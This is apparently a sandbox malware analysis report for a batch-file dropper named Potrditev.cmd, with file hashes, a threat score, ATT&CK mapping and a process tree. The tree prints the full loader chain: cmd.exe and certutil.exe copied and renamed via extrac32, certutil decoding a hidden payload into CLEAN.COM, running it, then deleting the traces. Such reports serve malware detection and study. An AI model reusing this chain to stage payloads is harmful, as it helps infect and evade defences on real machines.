20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc

Analysis

max time kernel
110s
max time network
17s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
03-08-2024 14:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Potrditev.cmd
Size

2.8MB
MD5

306e6e3743666b8f5fedb0127b041883
SHA1

53ac1756ee69296be5f5c99ee18b1d1cb70369d4
SHA256

20a156c7ad57c2c78a63e7f8d318d2bbba7e0d94186f92ef469aed643e1bf5cc
SHA512

233d9861fe624b707fe4b89435cf27f1216006e97b97374fa159574d63ca6db351fc2cba454554c82d210ca6f8a4f8be383c6723eab0a54ac1a2e984317804c1
SSDEEP

24576:RrZhKnjYBTiXW66DrApJCe4tnUNLgVaQzNqWDNRp6KNng1pyyIzmAZrQf3m29Yqk:Rr0jYNi8DrApkpUNLgVDzNVpeIh/c2B

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 8 IoCs

pid	Process
2612	alpha.exe
2704	alpha.exe
2968	kn.exe
2740	alpha.exe
2660	kn.exe
2624	CLEAN.COM
2656	alpha.exe
2220	alpha.exe

Loads dropped DLL 7 IoCs

pid	Process
3000	cmd.exe
3000	cmd.exe
2704	alpha.exe
3000	cmd.exe
2740	alpha.exe
3000	cmd.exe
3000	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CLEAN.COM

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2624	CLEAN.COM

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 3000 wrote to memory of 2800	3000	cmd.exe	31
PID 3000 wrote to memory of 2800	3000	cmd.exe	31
PID 3000 wrote to memory of 2800	3000	cmd.exe	31
PID 3000 wrote to memory of 2612	3000	cmd.exe	32
PID 3000 wrote to memory of 2612	3000	cmd.exe	32
PID 3000 wrote to memory of 2612	3000	cmd.exe	32
PID 2612 wrote to memory of 2720	2612	alpha.exe	33
PID 2612 wrote to memory of 2720	2612	alpha.exe	33
PID 2612 wrote to memory of 2720	2612	alpha.exe	33
PID 3000 wrote to memory of 2704	3000	cmd.exe	34
PID 3000 wrote to memory of 2704	3000	cmd.exe	34
PID 3000 wrote to memory of 2704	3000	cmd.exe	34
PID 2704 wrote to memory of 2968	2704	alpha.exe	35
PID 2704 wrote to memory of 2968	2704	alpha.exe	35
PID 2704 wrote to memory of 2968	2704	alpha.exe	35
PID 3000 wrote to memory of 2740	3000	cmd.exe	36
PID 3000 wrote to memory of 2740	3000	cmd.exe	36
PID 3000 wrote to memory of 2740	3000	cmd.exe	36
PID 2740 wrote to memory of 2660	2740	alpha.exe	37
PID 2740 wrote to memory of 2660	2740	alpha.exe	37
PID 2740 wrote to memory of 2660	2740	alpha.exe	37
PID 3000 wrote to memory of 2624	3000	cmd.exe	38
PID 3000 wrote to memory of 2624	3000	cmd.exe	38
PID 3000 wrote to memory of 2624	3000	cmd.exe	38
PID 3000 wrote to memory of 2624	3000	cmd.exe	38
PID 3000 wrote to memory of 2656	3000	cmd.exe	39
PID 3000 wrote to memory of 2656	3000	cmd.exe	39
PID 3000 wrote to memory of 2656	3000	cmd.exe	39
PID 3000 wrote to memory of 2220	3000	cmd.exe	40
PID 3000 wrote to memory of 2220	3000	cmd.exe	40
PID 3000 wrote to memory of 2220	3000	cmd.exe	40

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3000
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:2800
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2612
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:2720
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Potrditev.cmd" "C:\\Users\\Public\\CLEAN.GIF" 9
    3⤵
    - Executes dropped EXE
    PID:2968
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\CLEAN.GIF" "C:\\Users\\Public\\Libraries\\CLEAN.COM" 12
    3⤵
    - Executes dropped EXE
    PID:2660
- C:\Users\Public\Libraries\CLEAN.COM
  C:\Users\Public\Libraries\CLEAN.COM
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: CmdExeWriteProcessMemorySpam
  PID:2624
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2656
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\CLEAN.GIF" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\CLEAN.GIF

Filesize
1.9MB

MD5
523ccf257ca222401cd3915ac086f986

SHA1
d9dcb0b165fbf6b5e085d7a70009f3924a7968e4

SHA256
e52726ecfc11680f894efff7398e244424efffd0b8fb222a7a4c1afa7c7a20f8

SHA512
1fa4acc83444c7eacfc6295bb5b24be779f986ae726a76da2cd8f0c27dfaee6c639684efa45e4515f91bdbb027025d40275a0f425344bf9fc21558807b8f544f

Download Submit
C:\Users\Public\Libraries\CLEAN.COM

Filesize
957KB

MD5
aa4820620a6d753208dbd180c8ddc87a

SHA1
d687b79b4eb4359d7c310681e978c1be1ff46109

SHA256
ae5740d23ffac06e5bda5dd0acfa6023df3c7951ca0c97bd3dc4b1dd22a34525

SHA512
1994729cd2458ca85ca4add2ace7e1f636c941b0aef4dd1d2ecbe80324463705697387b1aaf4d7413011fef3d87415bcf0d0e3e2088e18e18c5925e06688f8a6

Download Submit
C:\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
memory/2624-33-0x0000000000400000-0x00000000004F9000-memory.dmp

Filesize
996KB

Download